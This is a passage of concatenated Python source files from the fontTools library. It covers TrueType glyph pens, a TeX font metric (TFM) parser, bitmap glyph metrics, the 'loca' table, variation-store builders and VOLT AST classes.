getattr(self.glyphSet[glyphName], self.drawMethod)(tpen)
def _isClosed(self):
"""
Check if the current path is closed.
"""
raise NotImplementedError
def init(self) -> None:
self.points = []
self.endPts = []
self.types = []
self.components = []
def addComponent(
self,
baseGlyphName: str,
transformation: Tuple[float, float, float, float, float, float],
identifier: Optional[str] = None,
**kwargs: Any,
) -> None:
"""
Add a sub glyph.
"""
self.components.append((baseGlyphName, transformation))
def _buildComponents(self, componentFlags):
if self.handleOverflowingTransforms:
# we can't encode transform values > 2 or < -2 in F2Dot14,
# so we must decompose the glyph if any transform exceeds these
overflowing = any(
s > 2 or s < -2
for (glyphName, transformation) in self.components
for s in transformation[:4]
)
components = []
for glyphName, transformation in self.components:
if glyphName not in self.glyphSet:
self.log.warning(f"skipped non-existing component '{glyphName}'")
continue
if self.points or (self.handleOverflowingTransforms and overflowing):
# can't have both coordinates and components, so decompose
self._decompose(glyphName, transformation)
continue
component = GlyphComponent()
component.glyphName = glyphName
component.x, component.y = (otRound(v) for v in transformation[4:])
# quantize floats to F2Dot14 so we get same values as when decompiled
# from a binary glyf table
transformation = tuple(
floatToFixedToFloat(v, 14) for v in transformation[:4]
)
if transformation != (1, 0, 0, 1):
if self.handleOverflowingTransforms and any(
MAX_F2DOT14 < s <= 2 for s in transformation
):
# clamp values ~= +2.0 so we can keep the component
transformation = tuple(
MAX_F2DOT14 if MAX_F2DOT14 < s <= 2 else s
for s in transformation
)
component.transform = (transformation[:2], transformation[2:])
component.flags = componentFlags
components.append(component)
return components
def glyph(self, componentFlags: int = 0x4) -> Glyph:
"""
Returns a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
if not self._isClosed():
raise PenError("Didn't close last contour.")
components = self._buildComponents(componentFlags)
glyph = Glyph()
glyph.coordinates = GlyphCoordinates(self.points)
glyph.coordinates.toInt()
glyph.endPtsOfContours = self.endPts
glyph.flags = array("B", self.types)
self.init()
if components:
# If both components and contours were present, they have by now
# been decomposed by _buildComponents.
glyph.components = components
glyph.numberOfContours = -1
else:
glyph.numberOfContours = len(glyph.endPtsOfContours)
glyph.program = ttProgram.Program()
glyph.program.fromBytecode(b"")
return glyph
class TTGlyphPen(_TTGlyphBasePen, LoggingPen):
"""
Pen used for drawing to a TrueType glyph.
This pen can be used to construct or modify glyphs in a TrueType format
font. After using the pen to draw, use the ``.glyph()`` method to retrieve
a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
drawMethod = "draw"
transformPen = TransformPen
def _addPoint(self, pt: Tuple[float, float], onCurve: int) -> None:
self.points.append(pt)
self.types.append(onCurve)
def _popPoint(self) -> None:
self.points.pop()
self.types.pop()
def _isClosed(self) -> bool:
return (not self.points) or (
self.endPts and self.endPts[-1] == len(self.points) - 1
)
def lineTo(self, pt: Tuple[float, float]) -> None:
self._addPoint(pt, 1)
def moveTo(self, pt: Tuple[float, float]) -> None:
if not self._isClosed():
raise PenError('"move"-type point must begin a new contour.')
self._addPoint(pt, 1)
def curveTo(self, *points) -> None:
raise NotImplementedError
def qCurveTo(self, *points) -> None:
assert len(points) >= 1
for pt in points[:-1]:
self._addPoint(pt, 0)
# last point is None if there are no on-curve points
if points[-1] is not None:
self._addPoint(points[-1], 1)
def closePath(self) -> None:
endPt = len(self.points) - 1
# ignore anchors (one-point paths)
if endPt == 0 or (self.endPts and endPt == self.endPts[-1] + 1):
self._popPoint()
return
# if first and last point on this path are the same, remove last
startPt = 0
if self.endPts:
startPt = self.endPts[-1] + 1
if self.points[startPt] == self.points[endPt]:
self._popPoint()
endPt -= 1
self.endPts.append(endPt)
def endPath(self) -> None:
# TrueType contours are always "closed"
self.closePath()
class TTGlyphPointPen(_TTGlyphBasePen, LogMixin, AbstractPointPen):
"""
Point pen used for drawing to a TrueType glyph.
This pen can be used to construct or modify glyphs in a TrueType format
font. After using the pen to draw, use the ``.glyph()`` method to retrieve
a :py:class:`~._g_l_y_f.Glyph` object representing the glyph.
"""
drawMethod = "drawPoints"
transformPen = TransformPointPen
def init(self) -> None:
super().init()
self._currentContourStartIndex = None
def _isClosed(self) -> bool:
return self._currentContourStartIndex is None
def beginPath(self, identifier: Optional[str] = None, **kwargs: Any) -> None:
"""
Start a new sub path.
"""
if not self._isClosed():
raise PenError("Didn't close previous contour.")
self._currentContourStartIndex = len(self.points)
def endPath(self) -> None:
"""
End the current sub path.
"""
# TrueType contours are always "closed"
if self._isClosed():
raise PenError("Contour is already closed.")
if self._currentContourStartIndex == len(self.points):
raise PenError("Tried to end an empty contour.")
self.endPts.append(len(self.points) - 1)
self._currentContourStartIndex = None
def addPoint(
self,
pt: Tuple[float, float],
segmentType: Optional[str] = None,
smooth: bool = False,
name: Optional[str] = None,
identifier: Optional[str] = None,
**kwargs: Any,
) -> None:
"""
Add a point to the current sub path.
"""
if self._isClosed():
raise PenError("Can't add a point to a closed contour.")
if segmentType is None:
self.types.append(0) # offcurve
elif segmentType in ("qcurve", "line", "move"):
self.types.append(1) # oncurve
elif segmentType == "curve":
raise NotImplementedError("cubic curves are not supported")
else:
raise AssertionError(segmentType)
self.points.append(pt)
```
#### File: site-packages/fontTools/tfmLib.py
```python
from types import SimpleNamespace
from fontTools.misc.sstruct import calcsize, unpack, unpack2
SIZES_FORMAT = """
>
lf: h # length of the entire file, in words
lh: h # length of the header data, in words
bc: h # smallest character code in the font
ec: h # largest character code in the font
nw: h # number of words in the width table
nh: h # number of words in the height table
nd: h # number of words in the depth table
ni: h # number of words in the italic correction table
nl: h # number of words in the ligature/kern table
nk: h # number of words in the kern table
ne: h # number of words in the extensible character table
np: h # number of font parameter words
"""
SIZES_SIZE = calcsize(SIZES_FORMAT)
FIXED_FORMAT = "12.20F"
HEADER_FORMAT1 = f"""
>
checksum: L
designsize: {FIXED_FORMAT}
"""
HEADER_FORMAT2 = f"""
{HEADER_FORMAT1}
codingscheme: 40p
"""
HEADER_FORMAT3 = f"""
{HEADER_FORMAT2}
family: 20p
"""
HEADER_FORMAT4 = f"""
{HEADER_FORMAT3}
seven_bit_safe_flag: ?
ignored: x
ignored: x
face: B
"""
HEADER_SIZE1 = calcsize(HEADER_FORMAT1)
HEADER_SIZE2 = calcsize(HEADER_FORMAT2)
HEADER_SIZE3 = calcsize(HEADER_FORMAT3)
HEADER_SIZE4 = calcsize(HEADER_FORMAT4)
LIG_KERN_COMMAND = """
>
skip_byte: B
next_char: B
op_byte: B
remainder: B
"""
BASE_PARAMS = [
"SLANT",
"SPACE",
"STRETCH",
"SHRINK",
"XHEIGHT",
"QUAD",
"EXTRASPACE",
]
MATHSY_PARAMS = [
"NUM1",
"NUM2",
"NUM3",
"DENOM1",
"DENOM2",
"SUP1",
"SUP2",
"SUP3",
"SUB1",
"SUB2",
"SUPDROP",
"SUBDROP",
"DELIM1",
"DELIM2",
"AXISHEIGHT",
]
MATHEX_PARAMS = [
"DEFAULTRULETHICKNESS",
"BIGOPSPACING1",
"BIGOPSPACING2",
"BIGOPSPACING3",
"BIGOPSPACING4",
"BIGOPSPACING5",
]
VANILLA = 0
MATHSY = 1
MATHEX = 2
UNREACHABLE = 0
PASSTHROUGH = 1
ACCESSABLE = 2
NO_TAG = 0
LIG_TAG = 1
LIST_TAG = 2
EXT_TAG = 3
STOP_FLAG = 128
KERN_FLAG = 128
class TFMException(Exception):
def __init__(self, message):
super().__init__(message)
class TFM:
def __init__(self, file):
self._read(file)
def __repr__(self):
return (
f"<TFM"
f" for {self.family}"
f" in {self.codingscheme}"
f" at {self.designsize:g}pt>"
)
def _read(self, file):
if hasattr(file, "read"):
data = file.read()
else:
with open(file, "rb") as fp:
data = fp.read()
self._data = data
if len(data) < SIZES_SIZE:
raise TFMException("Too short input file")
sizes = SimpleNamespace()
unpack2(SIZES_FORMAT, data, sizes)
# Do some file structure sanity checks.
# TeX and TFtoPL do additional functional checks and might even correct
# “errors” in the input file, but we instead try to output the file as
# it is as long as it is parsable, even if the data make no sense.
if sizes.lf < 0:
raise TFMException("The file claims to have negative or zero length!")
if len(data) < sizes.lf * 4:
raise TFMException("The file has fewer bytes than it claims!")
for name, length in vars(sizes).items():
if length < 0:
raise TFMException("The subfile size: '{name}' is negative!")
if sizes.lh < 2:
raise TFMException(f"The header length is only {sizes.lh}!")
if sizes.bc > sizes.ec + 1 or sizes.ec > 255:
raise TFMException(
f"The character code range {sizes.bc}..{sizes.ec} is illegal!"
)
if sizes.nw == 0 or sizes.nh == 0 or sizes.nd == 0 or sizes.ni == 0:
raise TFMException("Incomplete subfiles for character dimensions!")
if sizes.ne > 256:
raise TFMException(f"There are {ne} extensible recipes!")
if sizes.lf != (
6
+ sizes.lh
+ (sizes.ec - sizes.bc + 1)
+ sizes.nw
+ sizes.nh
+ sizes.nd
+ sizes.ni
+ sizes.nl
+ sizes.nk
+ sizes.ne
+ sizes.np
):
raise TFMException("Subfile sizes don’t add up to the stated total")
# Subfile offsets, used in the helper function below. These all are
# 32-bit word offsets not 8-bit byte offsets.
char_base = 6 + sizes.lh - sizes.bc
width_base = char_base + sizes.ec + 1
height_base = width_base + sizes.nw
depth_base = height_base + sizes.nh
italic_base = depth_base + sizes.nd
lig_kern_base = italic_base + sizes.ni
kern_base = lig_kern_base + sizes.nl
exten_base = kern_base + sizes.nk
param_base = exten_base + sizes.ne
# Helper functions for accessing individual data. If this looks
# nonidiomatic Python, I blame the effect of reading the literate WEB
# documentation of TFtoPL.
def char_info(c):
return 4 * (char_base + c)
def width_index(c):
return data[char_info(c)]
def noneexistent(c):
return c < sizes.bc or c > sizes.ec or width_index(c) == 0
def height_index(c):
return data[char_info(c) + 1] // 16
def depth_index(c):
return data[char_info(c) + 1] % 16
def italic_index(c):
return data[char_info(c) + 2] // 4
def tag(c):
return data[char_info(c) + 2] % 4
def remainder(c):
return data[char_info(c) + 3]
def width(c):
r = 4 * (width_base + width_index(c))
return read_fixed(r, "v")["v"]
def height(c):
r = 4 * (height_base + height_index(c))
return read_fixed(r, "v")["v"]
def depth(c):
r = 4 * (depth_base + depth_index(c))
return read_fixed(r, "v")["v"]
def italic(c):
r = 4 * (italic_base + italic_index(c))
return read_fixed(r, "v")["v"]
def exten(c):
return 4 * (exten_base + remainder(c))
def lig_step(i):
return 4 * (lig_kern_base + i)
def lig_kern_command(i):
command = SimpleNamespace()
unpack2(LIG_KERN_COMMAND, data[i:], command)
return command
def kern(i):
r = 4 * (kern_base + i)
return read_fixed(r, "v")["v"]
def param(i):
return 4 * (param_base + i)
def read_fixed(index, key, obj=None):
ret = unpack2(f">;{key}:{FIXED_FORMAT}", data[index:], obj)
return ret[0]
# Set all attributes to empty values regardless of the header size.
unpack(HEADER_FORMAT4, [0] * HEADER_SIZE4, self)
offset = 24
length = sizes.lh * 4
self.extraheader = {}
if length >= HEADER_SIZE4:
rest = unpack2(HEADER_FORMAT4, data[offset:], self)[1]
if self.face < 18:
s = self.face % 2
b = self.face // 2
self.face = "MBL"[b % 3] + "RI"[s] + "RCE"[b // 3]
for i in range(sizes.lh - HEADER_SIZE4 // 4):
rest = unpack2(f">;HEADER{i + 18}:l", rest, self.extraheader)[1]
elif length >= HEADER_SIZE3:
unpack2(HEADER_FORMAT3, data[offset:], self)
elif length >= HEADER_SIZE2:
unpack2(HEADER_FORMAT2, data[offset:], self)
elif length >= HEADER_SIZE1:
unpack2(HEADER_FORMAT1, data[offset:], self)
self.fonttype = VANILLA
scheme = self.codingscheme.upper()
if scheme.startswith("TEX MATH SY"):
self.fonttype = MATHSY
elif scheme.startswith("TEX MATH EX"):
self.fonttype = MATHEX
self.fontdimens = {}
for i in range(sizes.np):
name = f"PARAMETER{i+1}"
if i <= 6:
name = BASE_PARAMS[i]
elif self.fonttype == MATHSY and i <= 21:
name = MATHSY_PARAMS[i - 7]
elif self.fonttype == MATHEX and i <= 12:
name = MATHEX_PARAMS[i - 7]
read_fixed(param(i), name, self.fontdimens)
lig_kern_map = {}
self.right_boundary_char = None
self.left_boundary_char = None
if sizes.nl > 0:
cmd = lig_kern_command(lig_step(0))
if cmd.skip_byte == 255:
self.right_boundary_char = cmd.next_char
cmd = lig_kern_command(lig_step((sizes.nl - 1)))
if cmd.skip_byte == 255:
self.left_boundary_char = 256
r = 256 * cmd.op_byte + cmd.remainder
lig_kern_map[self.left_boundary_char] = r
self.chars = {}
for c in range(sizes.bc, sizes.ec + 1):
if width_index(c) > 0:
self.chars[c] = info = {}
info["width"] = width(c)
if height_index(c) > 0:
info["height"] = height(c)
if depth_index(c) > 0:
info["depth"] = depth(c)
if italic_index(c) > 0:
info["italic"] = italic(c)
char_tag = tag(c)
if char_tag == NO_TAG:
pass
elif char_tag == LIG_TAG:
lig_kern_map[c] = remainder(c)
elif char_tag == LIST_TAG:
info["nextlarger"] = remainder(c)
elif char_tag == EXT_TAG:
info["varchar"] = varchar = {}
for i in range(4):
part = data[exten(c) + i]
if i == 3 or part > 0:
name = "rep"
if i == 0:
name = "top"
elif i == 1:
name = "mid"
elif i == 2:
name = "bot"
if noneexistent(part):
varchar[name] = c
else:
varchar[name] = part
self.ligatures = {}
self.kerning = {}
for c, i in sorted(lig_kern_map.items()):
cmd = lig_kern_command(lig_step(i))
if cmd.skip_byte > STOP_FLAG:
i = 256 * cmd.op_byte + cmd.remainder
while i < sizes.nl:
cmd = lig_kern_command(lig_step(i))
if cmd.skip_byte > STOP_FLAG:
pass
else:
if cmd.op_byte >= KERN_FLAG:
r = 256 * (cmd.op_byte - KERN_FLAG) + cmd.remainder
self.kerning.setdefault(c, {})[cmd.next_char] = kern(r)
else:
r = cmd.op_byte
if r == 4 or (r > 7 and r != 11):
# Ligature step with nonstandard code, we output
# the code verbatim.
lig = r
else:
lig = ""
if r % 4 > 1:
lig += "/"
lig += "LIG"
if r % 2 != 0:
lig += "/"
while r > 3:
lig += ">"
r -= 4
self.ligatures.setdefault(c, {})[cmd.next_char] = (
lig,
cmd.remainder,
)
if cmd.skip_byte >= STOP_FLAG:
break
i += cmd.skip_byte + 1
if __name__ == "__main__":
import sys
tfm = TFM(sys.argv[1])
print(
"\n".join(
x
for x in [
f"tfm.checksum={tfm.checksum}",
f"tfm.designsize={tfm.designsize}",
f"tfm.codingscheme={tfm.codingscheme}",
f"tfm.fonttype={tfm.fonttype}",
f"tfm.family={tfm.family}",
f"tfm.seven_bit_safe_flag={tfm.seven_bit_safe_flag}",
f"tfm.face={tfm.face}",
f"tfm.extraheader={tfm.extraheader}",
f"tfm.fontdimens={tfm.fontdimens}",
f"tfm.right_boundary_char={tfm.right_boundary_char}",
f"tfm.left_boundary_char={tfm.left_boundary_char}",
f"tfm.kerning={tfm.kerning}",
f"tfm.ligatures={tfm.ligatures}",
f"tfm.chars={tfm.chars}",
]
)
)
print(tfm)
```
#### File: ttLib/tables/BitmapGlyphMetrics.py
```python
from fontTools.misc import sstruct
from fontTools.misc.textTools import safeEval
import logging
log = logging.getLogger(__name__)
bigGlyphMetricsFormat = """
> # big endian
height: B
width: B
horiBearingX: b
horiBearingY: b
horiAdvance: B
vertBearingX: b
vertBearingY: b
vertAdvance: B
"""
smallGlyphMetricsFormat = """
> # big endian
height: B
width: B
BearingX: b
BearingY: b
Advance: B
"""
class BitmapGlyphMetrics(object):
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__)
writer.newline()
for metricName in sstruct.getformat(self.__class__.binaryFormat)[1]:
writer.simpletag(metricName, value=getattr(self, metricName))
writer.newline()
writer.endtag(self.__class__.__name__)
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
metricNames = set(sstruct.getformat(self.__class__.binaryFormat)[1])
for element in content:
if not isinstance(element, tuple):
continue
name, attrs, content = element
# Make sure this is a metric that is needed by GlyphMetrics.
if name in metricNames:
vars(self)[name] = safeEval(attrs['value'])
else:
log.warning("unknown name '%s' being ignored in %s.", name, self.__class__.__name__)
class BigGlyphMetrics(BitmapGlyphMetrics):
binaryFormat = bigGlyphMetricsFormat
class SmallGlyphMetrics(BitmapGlyphMetrics):
binaryFormat = smallGlyphMetricsFormat
```
#### File: ttLib/tables/_l_o_c_a.py
```python
from . import DefaultTable
import sys
import array
import logging
log = logging.getLogger(__name__)
class table__l_o_c_a(DefaultTable.DefaultTable):
dependencies = ['glyf']
def decompile(self, data, ttFont):
longFormat = ttFont['head'].indexToLocFormat
if longFormat:
format = "I"
else:
format = "H"
locations = array.array(format)
locations.frombytes(data)
if sys.byteorder != "big": locations.byteswap()
if not longFormat:
l = array.array("I")
for i in range(len(locations)):
l.append(locations[i] * 2)
locations = l
if len(locations) < (ttFont['maxp'].numGlyphs + 1):
log.warning("corrupt 'loca' table, or wrong numGlyphs in 'maxp': %d %d",
len(locations) - 1, ttFont['maxp'].numGlyphs)
self.locations = locations
def compile(self, ttFont):
try:
max_location = max(self.locations)
except AttributeError:
self.set([])
max_location = 0
if max_location < 0x20000 and all(l % 2 == 0 for l in self.locations):
locations = array.array("H")
for i in range(len(self.locations)):
locations.append(self.locations[i] // 2)
ttFont['head'].indexToLocFormat = 0
else:
locations = array.array("I", self.locations)
ttFont['head'].indexToLocFormat = 1
if sys.byteorder != "big": locations.byteswap()
return locations.tobytes()
def set(self, locations):
self.locations = array.array("I", locations)
def toXML(self, writer, ttFont):
writer.comment("The 'loca' table will be calculated by the compiler")
writer.newline()
def __getitem__(self, index):
return self.locations[index]
def __len__(self):
return len(self.locations)
```
#### File: fontTools/varLib/builder.py
```python
from fontTools import ttLib
from fontTools.ttLib.tables import otTables as ot
# VariationStore
def buildVarRegionAxis(axisSupport):
self = ot.VarRegionAxis()
self.StartCoord, self.PeakCoord, self.EndCoord = [float(v) for v in axisSupport]
return self
def buildVarRegion(support, axisTags):
assert all(tag in axisTags for tag in support.keys()), ("Unknown axis tag found.", support, axisTags)
self = ot.VarRegion()
self.VarRegionAxis = []
for tag in axisTags:
self.VarRegionAxis.append(buildVarRegionAxis(support.get(tag, (0,0,0))))
return self
def buildVarRegionList(supports, axisTags):
self = ot.VarRegionList()
self.RegionAxisCount = len(axisTags)
self.Region = []
for support in supports:
self.Region.append(buildVarRegion(support, axisTags))
self.RegionCount = len(self.Region)
return self
def _reorderItem(lst, mapping):
return [lst[i] for i in mapping]
def VarData_calculateNumShorts(self, optimize=False):
count = self.VarRegionCount
items = self.Item
bit_lengths = [0] * count
for item in items:
# The "+ (i < -1)" magic is to handle two's-compliment.
# That is, we want to get back 7 for -128, whereas
# bit_length() returns 8. Similarly for -65536.
# The reason "i < -1" is used instead of "i < 0" is that
# the latter would make it return 0 for "-1" instead of 1.
bl = [(i + (i < -1)).bit_length() for i in item]
bit_lengths = [max(*pair) for pair in zip(bl, bit_lengths)]
# The addition of 8, instead of seven, is to account for the sign bit.
# This "((b + 8) >> 3) if b else 0" when combined with the above
# "(i + (i < -1)).bit_length()" is a faster way to compute byte-lengths
# conforming to:
#
# byte_length = (0 if i == 0 else
# 1 if -128 <= i < 128 else
# 2 if -65536 <= i < 65536 else
# ...)
byte_lengths = [((b + 8) >> 3) if b else 0 for b in bit_lengths]
# https://github.com/fonttools/fonttools/issues/2279
longWords = any(b > 2 for b in byte_lengths)
if optimize:
# Reorder columns such that wider columns come before narrower columns
mapping = []
mapping.extend(i for i,b in enumerate(byte_lengths) if b > 2)
mapping.extend(i for i,b in enumerate(byte_lengths) if b == 2)
mapping.extend(i for i,b in enumerate(byte_lengths) if b == 1)
byte_lengths = _reorderItem(byte_lengths, mapping)
self.VarRegionIndex = _reorderItem(self.VarRegionIndex, mapping)
self.VarRegionCount = len(self.VarRegionIndex)
for i in range(len(items)):
items[i] = _reorderItem(items[i], mapping)
if longWords:
self.NumShorts = max((i for i,b in enumerate(byte_lengths) if b > 2), default=-1) + 1
self.NumShorts |= 0x8000
else:
self.NumShorts = max((i for i,b in enumerate(byte_lengths) if b > 1), default=-1) + 1
self.VarRegionCount = len(self.VarRegionIndex)
return self
ot.VarData.calculateNumShorts = VarData_calculateNumShorts
def VarData_CalculateNumShorts(self, optimize=True):
"""Deprecated name for VarData_calculateNumShorts() which
defaults to optimize=True. Use varData.calculateNumShorts()
or varData.optimize()."""
return VarData_calculateNumShorts(self, optimize=optimize)
def VarData_optimize(self):
return VarData_calculateNumShorts(self, optimize=True)
ot.VarData.optimize = VarData_optimize
def buildVarData(varRegionIndices, items, optimize=True):
self = ot.VarData()
self.VarRegionIndex = list(varRegionIndices)
regionCount = self.VarRegionCount = len(self.VarRegionIndex)
records = self.Item = []
if items:
for item in items:
assert len(item) == regionCount
records.append(list(item))
self.ItemCount = len(self.Item)
self.calculateNumShorts(optimize=optimize)
return self
def buildVarStore(varRegionList, varDataList):
self = ot.VarStore()
self.Format = 1
self.VarRegionList = varRegionList
self.VarData = list(varDataList)
self.VarDataCount = len(self.VarData)
return self
# Variation helpers
def buildVarIdxMap(varIdxes, glyphOrder):
self = ot.VarIdxMap()
self.mapping = {g:v for g,v in zip(glyphOrder, varIdxes)}
return self
def buildDeltaSetIndexMap(varIdxes):
self = ot.DeltaSetIndexMap()
self.mapping = list(varIdxes)
self.Format = 1 if len(varIdxes) > 0xFFFF else 0
return self
def buildVarDevTable(varIdx):
self = ot.Device()
self.DeltaFormat = 0x8000
self.StartSize = varIdx >> 16
self.EndSize = varIdx & 0xFFFF
return self
```
#### File: fontTools/voltLib/ast.py
```python
from fontTools.voltLib.error import VoltLibError
from typing import NamedTuple
class Pos(NamedTuple):
adv: int
dx: int
dy: int
adv_adjust_by: dict
dx_adjust_by: dict
dy_adjust_by: dict
def __str__(self):
res = ' POS'
for attr in ('adv', 'dx', 'dy'):
value = getattr(self, attr)
if value is not None:
res += f' {attr.upper()} {value}'
adjust_by = getattr(self, f'{attr}_adjust_by', {})
for size, adjustment in adjust_by.items():
res += f' ADJUST_BY {adjustment} AT {size}'
res += ' END_POS'
return res
class Element(object):
def __init__(self, location=None):
self.location = location
def build(self, builder):
pass
def __str__(self):
raise NotImplementedError
class Statement(Element):
pass
class Expression(Element):
pass
class VoltFile(Statement):
def __init__(self):
Statement.__init__(self, location=None)
self.statements = []
def build(self, builder):
for s in self.statements:
s.build(builder)
def __str__(self):
return '\n' + '\n'.join(str(s) for s in self.statements) + ' END\n'
class GlyphDefinition(Statement):
def __init__(self, name, gid, gunicode, gtype, components, location=None):
Statement.__init__(self, location)
self.name = name
self.id = gid
self.unicode = gunicode
self.type = gtype
self.components = components
def __str__(self):
res = f'DEF_GLYPH "{self.name}" ID {self.id}'
if self.unicode is not None:
if len(self.unicode) > 1:
unicodes = ','.join(f'U+{u:04X}' for u in self.unicode)
res += f' UNICODEVALUES "{unicodes}"'
else:
res += f' UNICODE {self.unicode[0]}'
if self.type is not None:
res += f' TYPE {self.type}'
if self.components is not None:
res += f' COMPONENTS {self.components}'
res += ' END_GLYPH'
return res
class GroupDefinition(Statement):
def __init__(self, name, enum, location=None):
Statement.__init__(self, location)
self.name = name
self.enum = enum
self.glyphs_ = None
def glyphSet(self, groups=None):
if groups is not None and self.name in groups:
raise VoltLibError(
'Group "%s" contains itself.' % (self.name),
self.location)
if self.glyphs_ is None:
if groups is None:
groups = set({self.name})
else:
groups.add(self.name)
self.glyphs_ = self.enum.glyphSet(groups)
return self.glyphs_
def __str__(self):
enum = self.enum and str(self.enum) or ''
return f'DEF_GROUP "{self.name}"\n{enum}\nEND_GROUP'
class GlyphName(Expression):
"""A single glyph name, such as cedilla."""
def __init__(self, glyph, location=None):
Expression.__init__(self, location)
self.glyph = glyph
def glyphSet(self):
return (self.glyph,)
def __str__(self):
return f' GLYPH "{self.glyph}"'
class Enum(Expression):
"""An enum"""
def __init__(self, enum, location=None):
Expression.__init__(self, location)
self.enum = enum
def __iter__(self):
for e in self.glyphSet():
yield e
def glyphSet(self, groups=None):
glyphs = []
for element in self.enum:
if isinstance(element, (GroupName, Enum)):
glyphs.extend(element.glyphSet(groups))
else:
glyphs.extend(element.glyphSet())
return tuple(glyphs)
def __str__(self):
enum = ''.join(str(e) for e in self.enum)
return f' ENUM{enum} END_ENUM'
class GroupName(Expression):
"""A glyph group"""
def __init__(self, group, parser, location=None):
Expression.__init__(self, location)
self.group = group
self.parser_ = parser
def glyphSet(self, groups=None):
group = self.parser_.resolve_group(self.group)
if group is not None:
self.glyphs_ = group.glyphSet(groups)
return self.glyphs_
else:
raise VoltLibError(
'Group "%s" is used but undefined.' % (self.group),
self.location)
def __str__(self):
return f' GROUP "{self.group}"'
class Range(Expression):
"""A glyph range"""
def __init__(self, start, end, parser, location=None):
Expression.__init__(self, location)
self.start = start
self.end = end
self.parser = parser
def glyphSet(self):
return tuple(self.parser.glyph_range(self.start, self.end))
def __str__(self):
return f' RANGE "{self.start}" TO "{self.end}"'
class ScriptDefinition(Statement):
def __init__(self, name, tag, langs, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.langs = langs
def __str__(self):
res = 'DEF_SCRIPT'
if self.name is not None:
res += f' NAME "{self.name}"'
res += f' TAG "{self.tag}"\n\n'
for lang in self.langs:
res += f'{lang}'
res += 'END_SCRIPT'
return res
class LangSysDefinition(Statement):
def __init__(self, name, tag, features, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.features = features
def __str__(self):
res = 'DEF_LANGSYS'
if self.name is not None:
res += f' NAME "{self.name}"'
res += f' TAG "{self.tag}"\n\n'
for feature in self.features:
res += f'{feature}'
res += 'END_LANGSYS\n'
return res
class FeatureDefinition(Statement):
def __init__(self, name, tag, lookups, location=None):
Statement.__init__(self, location)
self.name = name
self.tag = tag
self.lookups = lookups
def __str__(self):
res = f'DEF_FEATURE NAME "{self.name}" TAG "{self.tag}"\n'
res += ' ' + ' '.join(f'LOOKUP "{l}"' for l in self.lookups) + '\n'
res += 'END_FEATURE\n'
return res
class LookupDefinition(Statement):
def __init__(self, name, process_base, process_marks, mark_glyph_set,
direction, reversal, comments, context, sub, pos,
location=None):
Statement.__init__(self, location)
self.name = name
self.process_base = process_base
self.process_marks = process_marks
self.mark_glyph_set = mark_glyph_set
self.direction = direction
self.reversal = reversal
self.comments = comments
self.context = context
self.sub = sub
self.pos = pos
def __str__(self):
res = f'DEF_LOOKUP "{self.name}"'
res += f' {self.process_base and "PROCESS_BASE" or "SKIP_BASE"}'
if self.process_marks:
res += ' PROCESS_MARKS '
if self.mark_glyph_set:
res += f'MARK_GLYPH_SET "{self.mark_glyph_set}"'
elif isinstance(self.process_marks, str):
res += f'"{self.process_marks}"'
else:
res += 'ALL'
else:
res += ' SKIP_MARKS'
if self.direction is not None:
res += f' DIRECTION {self.direction}'
if self.reversal:
res += ' REVERSAL'
if self.comments is not None:
comments = self.comments.replace('\n', r'\n')
res += f'\nCOMMENTS "{comments}"'
if self.context:
res += '\n' + '\n'.join(str(c) for c in self.context)
else:
res += '\nIN_CONTEXT\nEND_CONTEXT'
if self.sub:
res += f'\n{self.sub}'
if self.pos:
res += f'\n{self.pos}'
return res
class SubstitutionDefinition(Statement):
def __init__(self, mapping, location=None):
Statement.__init__(self, location)
self.mapping = mapping
def __str__(self):
res = 'AS_SUBSTITUTION\n'
for src, dst in self.mapping.items():
src = ''.join(str(s) for s in src)
dst = ''.join(str(d) for d in dst)
res += f'SUB{src}\nWITH{dst}\nEND_SUB\n'
res += 'END_SUBSTITUTION'
return res
class SubstitutionSingleDefinition(SubstitutionDefinition):
pass
class SubstitutionMultipleDefinition(SubstitutionDefinition):
pass
class SubstitutionLigatureDefinition(SubstitutionDefinition):
pass
class SubstitutionReverseChainingSingleDefinition(SubstitutionDefinition):
pass
class PositionAttachDefinition(Statement):
def __init__(self, coverage, coverage_to, location=None):
Statement.__init__(self, location)
self.coverage = coverage
self.coverage_to = coverage_to
def __str__(self):
coverage = ''.join(str(c) for c in self.coverage)
res = f'AS_POSITION\nATTACH{coverage}\nTO'
for coverage, anchor in self.coverage_to:
coverage = ''.join(str(c) for c in coverage)
res += f'{coverage} AT ANCHOR "{anchor}"'
res += '\nEND_ATTACH\nEND_POSITION'
return res
class PositionAttachCursiveDefinition(Statement):
def __init__(self, coverages_exit, coverages_enter, location=None):
Statement.__init__(self, location)
self.coverages_exit = coverages_exit
self.coverages_enter = coverages_enter
def __str__(self):
res = 'AS_POSITION\nATTACH_CURSIVE'
for coverage in self.coverages_exit:
coverage = ''.join(str(c) for c in coverage)
res += f'\nEXIT {coverage}'
for coverage in self.coverages_enter:
coverage = ''.join(str(c) for c in coverage)
res += f'\nENTER {coverage}'
res += '\nEND_ATTACH\nEND_POSITION'
return res
class PositionAdjustPairDefinition(Statement):
def __init__(self, coverages_1, coverages_2, adjust_pair, location=None):
Statement.__init__(self, location)
self.coverages_1 = coverages_1
self.coverages_2 = coverages_2
self.adjust_pair = adjust_pair
def __str__(self):
res = 'AS_POSITION\nADJUST_PAIR\n'
for coverage in self.coverages_1:
coverage = ' '.join(str(c) for c in coverage)
res += f' FIRST {coverage}'
res += '\n'
for coverage in self.coverages_2:
coverage = ' '.join(str(c) for c in coverage)
res += f' SECOND {coverage}'
res += '\n'
for (id_1, id_2), (pos_1, pos_2) in self.adjust_pair.items():
res += f' {id_1} {id_2} BY{pos_1}{pos_2}\n'
res += '\nEND_ADJUST\nEND_POSITION'
return res
class PositionAdjustSingleDefinition(Statement):
def __init__(self, adjust_single, location=None):
Statement.__init__(self, location)
self.adjust_single = adjust_single
def __str__(self):
res = 'AS_POSITION\nADJUST_SINGLE'
for coverage, pos in self.adjust_single:
coverage = ''.join(str(c) for c in coverage)
res += f'{coverage} BY{pos}'
res += '\nEND_ADJUST\nEND_POSITION'
return res
class ContextDefinition(Statement):
def __init__(self, ex_or_in, left=None, right=None, location=None):
Statement.__init__(self, location)
self.ex_or_in = ex_or_in
self.left = left if left is not None else []
self.right = right if right is not None else []
def __str__(self):
res = self.ex_or_in + '\n'
for coverage in self.left:
